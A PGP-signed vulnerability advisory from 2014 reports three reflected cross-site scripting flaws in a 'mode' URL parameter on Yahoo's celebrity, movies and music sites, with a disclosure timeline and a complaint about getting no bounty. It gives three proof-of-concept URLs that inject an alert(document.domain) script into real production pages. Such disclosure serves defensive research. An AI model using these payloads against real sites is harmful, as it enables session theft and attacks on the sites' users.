-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 In Jan ?14 I reported three Cross-site Scripting vulnerabilities to the Yahoo Bug Bounty Program. And I know, it is really really hard, but ... again ... no feedback or bounty :) Advisory: Yahoo Bug Bounty Program Vulnerability #4 #5 #6 Cross-site Scripting vulnerabilities Advisory ID: SSCHADV2014-YahooBB-004 / YahooBB-005 / YahooBB-006 Author: Stefan Schurtz Affected Software: Successfully tested on celebrity.yahoo.com, movies.yahoo.com, music.yahoo.com Vendor URL: http://yahoo.com/ Vendor Status: Not tested anymore Bounty: nothing ========================== Vulnerability Description ========================== The 'mode'-Paramter on "https://celebrity.yahoo.com/", "https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a Cross-site Scripting vulnerability ========================== PoC-Exploit ========================== http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id= mode=multipart"-alert(document.domain)-"&__phase=pre&type=index ========================== Disclosure Timeline ========================== 20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program) ========================== Credits ========================== Vulnerabilities found and advisory written by Stefan Schurtz. ========================== References ========================== http://yahoo.com/ http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0 =+fff -----END PGP SIGNATURE-----